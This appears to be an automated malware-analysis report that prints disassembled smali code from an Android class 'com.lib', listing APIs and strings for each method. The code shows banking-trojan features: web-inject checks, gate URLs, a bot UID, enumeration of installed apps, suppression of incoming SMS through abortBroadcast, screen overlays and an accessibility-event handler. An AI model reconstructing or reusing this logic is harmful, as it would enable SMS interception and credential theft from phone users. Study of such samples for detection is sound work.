                        46invoke-virtual {p1, v1}, Landroid/webkit/WebView;->setSystemUiVisibility(I)V
                        48invoke-static {p2}, Landroid/graphics/Color;->parseColor(Ljava/lang/String;)I
                        49move-result v1
                        51invoke-virtual {p1, v1}, Landroid/webkit/WebView;->setBackgroundColor(I)V
                        53invoke-interface {v0, p1, v3}, Landroid/view/WindowManager;->addView(Landroid/view/View;Landroid/view/ViewGroup$LayoutParams;)V
                        54const/4 v0, 0x1
                        55goto_58: move v1, v0
                        56goto/16 :goto_3
                        57cond_5a: const/16 v0, 0x7d6
                        58goto/16 :goto_c
                        59cond_5d: move v0, v1
                        60goto/16 :goto_58
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.getBoolean
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [func] [isNeedWebInj] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        10const/4 v2, 0x0
                        12invoke-interface {v1, p3, v2}, Landroid/content/SharedPreferences;->getBoolean(Ljava/lang/String;Z)Z
                        13move-result v1
                        15iget-object v2, p0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        16try_end_12: if-nez v2, :cond_15
                        17const/4 v0, 0x1
                        18cond_15: and-int/2addr v0, v1
                        19try_start_16:
                        20sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        22invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        23goto_1b: return v0
                        24catch_1c: move-exception v1
                        25try_start_1d: new-instance v2, Ljava/lang/StringBuilder;
                        27invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        29const-string v3, "[func] [isNeedWebInj] T: "
                        31invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32move-result-object v2
                        34invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        35move-result-object v1
                        37invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        38move-result-object v1
                        40invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        41try_end_33:
                        42sget-object v1, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        44invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        45goto/16 :goto_1b
                        46catch_39: move-exception v1
                        47goto/16 :goto_1b
                        48catchall_3b: move-exception v1
                        50sget-object v2, Lcom/lib;->webMutex:Ljava/util/concurrent/Semaphore;
                        52invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        53throw v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.getString
                        • java.util.concurrent.Semaphore.release
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • [func] [getConfigID] T:
                        Position Instruction Meta Information
                        0.prologue
                        2const-string v0, ""
                        3try_start_2:
                        4sget-object v1, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        6invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        7try_end_7: const/4 v1, 0x0
                        8try_start_8:
                        9invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        10move-result-object v1
                        12sget-object v2, Lcom/lib;->STRINGS_ID:Ljava/lang/String;
                        14invoke-interface {v1, v2, v0}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        15try_end_11: move-result-object v0
                        16try_start_12:
                        17sget-object v1, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        19invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        20try_end_17: return-object v0
                        21catch_18: move-exception v1
                        22try_start_19: new-instance v2, Ljava/lang/StringBuilder;
                        24invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        26const-string v3, "[func] [getConfigID] T: "
                        28invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        29move-result-object v2
                        31invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        32move-result-object v1
                        34invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object v1
                        37invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        38try_start_2f:
                        39sget-object v1, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        41invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        42goto/16 :goto_17
                        43catch_35: move-exception v1
                        44goto/16 :goto_17
                        45catchall_37: move-exception v1
                        47sget-object v2, Lcom/lib;->configMutex:Ljava/util/concurrent/Semaphore;
                        49invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        50throw v1
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.<init>
                        • android.os.Build.MANUFACTURER:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • android.os.Build.MODEL:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • android.os.Build.MODEL:Ljava/lang/String
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • .jar
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/StringBuilder;
                        3invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        4new-instance v1, Ljava/lang/StringBuilder;
                        6invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        8sget-object v2, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
                        10invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        11move-result-object v1
                        13sget-object v2, Landroid/os/Build;->MODEL:Ljava/lang/String;
                        15invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16move-result-object v1
                        18sget-object v2, Landroid/os/Build;->MODEL:Ljava/lang/String;
                        20invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        21move-result-object v1
                        23invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        24move-result-object v1
                        26invoke-virtual {p0, v1}, Lcom/lib;->md5(Ljava/lang/String;)Ljava/lang/String;
                        27move-result-object v1
                        29invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        30move-result-object v0
                        32const-string v1, ".jar"
                        34invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        35move-result-object v0
                        37invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        38move-result-object v0
                        39return-object v0
                        Cross References
                        APIs
                        • java.lang.String.<init>
                        • java.security.MessageDigest.getInstance
                        • java.lang.String.getBytes
                        • java.security.MessageDigest.update
                        • java.security.MessageDigest.digest
                        • java.lang.StringBuffer.<init>
                        • java.lang.Integer.toHexString
                        • java.lang.StringBuffer.append
                        • java.lang.StringBuffer.toString
                        Strings
                        • MD5
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/String;
                        3invoke-direct {v0}, Ljava/lang/String;-><init>()V
                        4try_start_5:
                        5const-string v1, "MD5"
                        7invoke-static {v1}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
                        8move-result-object v1
                        10invoke-virtual {p1}, Ljava/lang/String;->getBytes()[B
                        11move-result-object v2
                        13invoke-virtual {v1, v2}, Ljava/security/MessageDigest;->update([B)V
                        15invoke-virtual {v1}, Ljava/security/MessageDigest;->digest()[B
                        16move-result-object v2
                        17new-instance v3, Ljava/lang/StringBuffer;
                        19invoke-direct {v3}, Ljava/lang/StringBuffer;-><init>()V
                        20const/4 v1, 0x0
                        21goto_1c: array-length v4, v2
                        22if-ge v1, v4, :cond_2d
                        23aget-byte v4, v2, v1
                        24and-int/lit16 v4, v4, 0xff
                        26invoke-static {v4}, Ljava/lang/Integer;->toHexString(I)Ljava/lang/String;
                        27move-result-object v4
                        29invoke-virtual {v3, v4}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;
                        30add-int/lit8 v1, v1, 0x1
                        31goto/16 :goto_1c
                        32cond_2d:
                        33invoke-virtual {v3}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;
                        34try_end_30: move-result-object v0
                        35goto_31: return-object v0
                        36catch_32: move-exception v1
                        37goto/16 :goto_31
                        Cross References
                        APIs
                        • android.content.Context.getSystemService
                        • android.widget.FrameLayout.<init>
                        • android.view.WindowManager$LayoutParams.<init>
                        • android.util.DisplayMetrics.<init>
                        • android.view.WindowManager.getDefaultDisplay
                        • android.view.Display.getMetrics
                        • android.view.WindowManager.addView
                        Strings
                        • window
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, -0x1
                        2sget v0, Landroid/os/Build$VERSION;->SDK_INT:I
                        3const/16 v2, 0x17
                        4if-lt v0, v2, :cond_3e
                        5const/16 v3, 0x7f0
                        6goto_9:
                        7const-string v0, "window"
                        9invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        10move-result-object v0
                        11move-object v6, v0
                        12check-cast v6, Landroid/view/WindowManager;
                        13new-instance v7, Landroid/widget/FrameLayout;
                        15invoke-direct {v7, p0}, Landroid/widget/FrameLayout;-><init>(Landroid/content/Context;)V
                        16new-instance v0, Landroid/view/WindowManager$LayoutParams;
                        17const/16 v4, 0x208
                        18const/4 v5, -0x3
                        19move v2, v1
                        21invoke-direct/range {v0 .. v5}, Landroid/view/WindowManager$LayoutParams;-><init>(IIIII)V
                        22new-instance v1, Landroid/util/DisplayMetrics;
                        24invoke-direct {v1}, Landroid/util/DisplayMetrics;-><init>()V
                        26invoke-interface {v6}, Landroid/view/WindowManager;->getDefaultDisplay()Landroid/view/Display;
                        27move-result-object v2
                        29invoke-virtual {v2, v1}, Landroid/view/Display;->getMetrics(Landroid/util/DisplayMetrics;)V
                        30if-eqz p1, :cond_41
                        31const/16 v2, 0x33
                        32iput v2, v0, Landroid/view/WindowManager$LayoutParams;->gravity:I
                        33iget v1, v1, Landroid/util/DisplayMetrics;->heightPixels:I
                        34mul-int/lit8 v1, v1, -0x1
                        35add-int/lit8 v1, v1, 0x19
                        36iput v1, v0, Landroid/view/WindowManager$LayoutParams;->y:I
                        37goto_3a:
                        38invoke-interface {v6, v7, v0}, Landroid/view/WindowManager;->addView(Landroid/view/View;Landroid/view/ViewGroup$LayoutParams;)V
                        39return-object v7
                        40cond_3e: const/16 v3, 0x7d6
                        41goto/16 :goto_9
                        42cond_41: const/16 v2, 0x53
                        43iput v2, v0, Landroid/view/WindowManager$LayoutParams;->gravity:I
                        44iget v1, v1, Landroid/util/DisplayMetrics;->heightPixels:I
                        45mul-int/lit8 v1, v1, -0x1
                        46add-int/lit8 v1, v1, 0x2d
                        47iput v1, v0, Landroid/view/WindowManager$LayoutParams;->y:I
                        48goto/16 :goto_3a
                        Cross References
                        APIs
                        • java.lang.String.<init>
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • java.lang.Integer.intValue
                        • java.lang.Integer.toString
                        • android.content.SharedPreferences.getString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/String;
                        3invoke-direct {v0}, Ljava/lang/String;-><init>()V
                        4if-eqz p4, :cond_c
                        5try_start_7:
                        6sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        8invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        9cond_c: const/4 v1, 0x0
                        10try_start_d:
                        11invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        12move-result-object v1
                        14invoke-virtual {p3}, Ljava/lang/Integer;->intValue()I
                        15move-result v2
                        17invoke-static {v2}, Ljava/lang/Integer;->toString(I)Ljava/lang/String;
                        18move-result-object v2
                        20invoke-interface {v1, v2, v0}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        21try_end_1c: move-result-object v0
                        22if-eqz p4, :cond_24
                        23try_start_1f:
                        24sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        26invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        27goto_24: return-object v0
                        28catch_25: move-exception v1
                        29if-eqz p4, :cond_24
                        31sget-object v1, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        33invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        34goto/16 :goto_24
                        35catch_2e: move-exception v1
                        36goto/16 :goto_24
                        37catchall_30: move-exception v1
                        38if-eqz p4, :cond_38
                        40sget-object v2, Lcom/lib;->gateUrlsMutex:Ljava/util/concurrent/Semaphore;
                        42invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        43cond_38: throw v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.getString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • UID
                        Position Instruction Meta Information
                        0.prologue
                        2const-string v0, ""
                        3try_start_2:
                        4sget-object v1, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        6invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        7try_end_7: const/4 v1, 0x0
                        8try_start_8:
                        9invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        10move-result-object v1
                        12const-string v2, "UID"
                        14invoke-interface {v1, v2, v0}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        15try_end_11: move-result-object v0
                        16try_start_12:
                        17sget-object v1, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        19invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        20goto_17: return-object v0
                        21catch_18: move-exception v1
                        23sget-object v1, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        25invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        26goto/16 :goto_17
                        27catch_1f: move-exception v1
                        28goto/16 :goto_17
                        29catchall_21: move-exception v1
                        31sget-object v2, Lcom/lib;->botUidMutex:Ljava/util/concurrent/Semaphore;
                        33invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        34throw v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.getBoolean
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Strings
                        • lockPinned
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        5invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        6try_end_6: const/4 v1, 0x0
                        7try_start_7:
                        8invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        9move-result-object v1
                        11const-string v2, "lockPinned"
                        12const/4 v3, 0x0
                        14invoke-interface {v1, v2, v3}, Landroid/content/SharedPreferences;->getBoolean(Ljava/lang/String;Z)Z
                        15try_end_11: move-result v0
                        16try_start_12:
                        17sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        19invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        20goto_17: return v0
                        21catch_18: move-exception v1
                        23sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        25invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        26goto/16 :goto_17
                        27catch_1f: move-exception v1
                        28goto/16 :goto_17
                        29catchall_21: move-exception v1
                        31sget-object v2, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        33invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        34throw v1
                        APIs
                        • android.content.res.Resources.getSystem
                        • android.content.res.Resources.getSystem
                        • android.content.res.Resources.getIdentifier
                        • android.content.res.Resources.getBoolean
                        Strings
                        • config_showNavigationBar
                        • bool
                        • android
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-static {}, Landroid/content/res/Resources;->getSystem()Landroid/content/res/Resources;
                        3move-result-object v0
                        5invoke-static {}, Landroid/content/res/Resources;->getSystem()Landroid/content/res/Resources;
                        6move-result-object v1
                        8const-string v2, "config_showNavigationBar"
                        10const-string v3, "bool"
                        12const-string v4, "android"
                        14invoke-virtual {v1, v2, v3, v4}, Landroid/content/res/Resources;->getIdentifier(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)I
                        15move-result v1
                        17invoke-virtual {v0, v1}, Landroid/content/res/Resources;->getBoolean(I)Z
                        18move-result v0
                        19if-eqz v0, :cond_1e
                        20const/4 v0, 0x0
                        22invoke-static {p1, v0}, Lcom/lib;->hideArea(Landroid/content/Context;Z)Landroid/widget/FrameLayout;
                        23move-result-object v0
                        24goto_1d: return-object v0
                        25cond_1e: const/4 v0, 0x0
                        26goto/16 :goto_1d
                        Cross References
                        APIs
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        Strings
                        • class
                        • type
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2const-string v0, "class"
                        4invoke-virtual {p1, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        5move-result v0
                        6if-nez v0, :cond_10
                        8const-string v0, "class"
                        10invoke-virtual {p1, v0}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        11move-result-object v0
                        12sput-object v0, Lcom/lib;->errorClass:Ljava/lang/String;
                        13cond_10:
                        14const-string v0, "type"
                        16invoke-virtual {p1, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        17move-result v0
                        18if-nez v0, :cond_20
                        20const-string v0, "type"
                        22invoke-virtual {p1, v0}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        23move-result-object v0
                        24sput-object v0, Lcom/lib;->errorType:Ljava/lang/String;
                        25cond_20: const/4 v0, 0x1
                        26sput-boolean v0, Lcom/lib;->isCheckError:Z
                        27goto_23: return-void
                        28catch_24: move-exception v0
                        29goto/16 :goto_23
                        Cross References
                        APIs
                        • android.content.Context.getPackageManager
                        • java.util.ArrayList.<init>
                        • android.content.pm.PackageManager.getInstalledApplications
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • android.content.pm.ApplicationInfo.packageName:Ljava/lang/String
                        • java.util.List.add
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Landroid/content/Context;",
                        4")",
                        5"Ljava/util/List",
                        6"<",
                        7"Ljava/lang/String;",
                        8">;"
                        9}
                        10.end annotation
                        11.prologue
                        13invoke-virtual {p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
                        14move-result-object v0
                        15new-instance v1, Ljava/util/ArrayList;
                        17invoke-direct {v1}, Ljava/util/ArrayList;-><init>()V
                        18if-eqz v0, :cond_27
                        19const/16 v2, 0x80
                        21invoke-virtual {v0, v2}, Landroid/content/pm/PackageManager;->getInstalledApplications(I)Ljava/util/List;
                        22move-result-object v0
                        24invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        25move-result-object v2
                        26goto_15:
                        27invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
                        28move-result v0
                        29if-eqz v0, :cond_27
                        31invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        32move-result-object v0
                        33check-cast v0, Landroid/content/pm/ApplicationInfo;
                        35iget-object v0, v0, Landroid/content/pm/ApplicationInfo;->packageName:Ljava/lang/String;
                        37invoke-interface {v1, v0}, Ljava/util/List;->add(Ljava/lang/Object;)Z
                        38goto/16 :goto_15
                        39cond_27: return-object v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.getString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        2const-string v0, ""
                        3try_start_2:
                        4sget-object v1, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        6invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        7try_end_7: const/4 v1, 0x0
                        8try_start_8:
                        9invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        10move-result-object v1
                        12sget-object v2, Lcom/lib;->STRINGS_DEFAULT:Ljava/lang/String;
                        14invoke-interface {v1, v2, v0}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        15try_end_11: move-result-object v0
                        16try_start_12:
                        17sget-object v1, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        19invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        20goto_17: return-object v0
                        21catch_18: move-exception v1
                        23sget-object v1, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        25invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        26goto/16 :goto_17
                        27catch_1f: move-exception v1
                        28goto/16 :goto_17
                        29catchall_21: move-exception v1
                        31sget-object v2, Lcom/lib;->smsAdminMutex:Ljava/util/concurrent/Semaphore;
                        33invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        34throw v1
                        Cross References
                        APIs
                        • java.util.concurrent.Semaphore.acquire
                        • android.content.Context.getSharedPreferences
                        • android.content.SharedPreferences.getString
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        Position Instruction Meta Information
                        0.prologue
                        2const-string v0, ""
                        3try_start_2:
                        4sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        6invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->acquire()V
                        7try_end_7: const/4 v1, 0x0
                        8try_start_8:
                        9invoke-virtual {p1, p2, v1}, Landroid/content/Context;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;
                        10move-result-object v1
                        12invoke-interface {v1, p3, v0}, Landroid/content/SharedPreferences;->getString(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        13try_end_f: move-result-object v0
                        14try_start_10:
                        15sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        17invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        18goto_15: return-object v0
                        19catch_16: move-exception v1
                        21sget-object v1, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        23invoke-virtual {v1}, Ljava/util/concurrent/Semaphore;->release()V
                        24goto/16 :goto_15
                        25catch_1d: move-exception v1
                        26goto/16 :goto_15
                        27catchall_1f: move-exception v1
                        29sget-object v2, Lcom/lib;->pinnedMutex:Ljava/util/concurrent/Semaphore;
                        31invoke-virtual {v2}, Ljava/util/concurrent/Semaphore;->release()V
                        32throw v1
                        Cross References
                        APIs
                        • java.security.MessageDigest.getInstance
                        • java.nio.charset.StandardCharsets.UTF_8:Ljava/nio/charset/Charset
                        • java.lang.String.getBytes
                        • java.security.MessageDigest.digest
                        Strings
                        • SHA-256
                        Position Instruction Meta Information
                        0try_start_0:
                        1const-string v0, "SHA-256"
                        3invoke-static {v0}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
                        4move-result-object v0
                        6sget-object v1, Ljava/nio/charset/StandardCharsets;->UTF_8:Ljava/nio/charset/Charset;
                        8invoke-virtual {p1, v1}, Ljava/lang/String;->getBytes(Ljava/nio/charset/Charset;)[B
                        9move-result-object p1
                        11invoke-virtual {v0, p1}, Ljava/security/MessageDigest;->digest([B)[B
                        12move-result-object p1
                        13try_end_10: return-object p1
                        14catchall_11: const/4 p1, 0x0
                        15return-object p1
                        APIs
                        • java.security.MessageDigest.getInstance
                        • java.security.MessageDigest.digest
                        Strings
                        • SHA-256
                        Position Instruction Meta Information
                        0.prologue
                        1try_start_0:
                        2const-string v0, "SHA-256"
                        4invoke-static {v0}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
                        5move-result-object v0
                        7invoke-virtual {v0, p1}, Ljava/security/MessageDigest;->digest([B)[B
                        8try_end_9: move-result-object v0
                        9goto_a: return-object v0
                        10catch_b: move-exception v0
                        11const/4 v0, 0x0
                        12goto/16 :goto_a
                        APIs
                        • java.security.MessageDigest.getInstance
                        • java.security.MessageDigest.digest
                        Strings
                        • SHA-256
                        Position Instruction Meta Information
                        0try_start_0:
                        1const-string v0, "SHA-256"
                        3invoke-static {v0}, Ljava/security/MessageDigest;->getInstance(Ljava/lang/String;)Ljava/security/MessageDigest;
                        4move-result-object v0
                        6invoke-virtual {v0, p1}, Ljava/security/MessageDigest;->digest([B)[B
                        7move-result-object p1
                        8try_end_a: return-object p1
                        9catchall_b: const/4 p1, 0x0
                        10return-object p1
                        Cross References
                        APIs
                        • android.content.BroadcastReceiver.abortBroadcast
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-virtual {p0, p1}, Lcom/lib;->isSmsAdmin(Landroid/content/Context;)Z
                        3move-result v0
                        4if-eqz v0, :cond_9
                        6invoke-virtual {p2}, Landroid/content/BroadcastReceiver;->abortBroadcast()V
                        7cond_9: return-void
                        Cross References
                        APIs
                        • android.content.BroadcastReceiver.abortBroadcast
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-virtual {p0, p1}, Lcom/lib;->isSmsAdmin(Landroid/content/Context;)Z
                        3move-result v0
                        4if-eqz v0, :cond_9
                        6invoke-virtual {p2}, Landroid/content/BroadcastReceiver;->abortBroadcast()V
                        7cond_9: return-void
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.concurrent.Semaphore.acquire
                        • org.json.JSONObject.<init>
                        • java.lang.String.isEmpty
                        • org.json.JSONObject.names
                        • org.json.JSONArray.getString
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.String.equals
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getBoolean
                        • org.json.JSONObject.toString
                        • org.json.JSONObject.toString
                        • android.view.accessibility.AccessibilityEvent.getSource
                        • java.util.concurrent.Semaphore.release
                        • java.util.concurrent.Semaphore.release
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.getJSONArray
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONArray.getJSONObject
                        • org.json.JSONObject.getJSONObject
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.isNull
                        • android.view.accessibility.AccessibilityEvent.getPackageName
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.getJSONObject
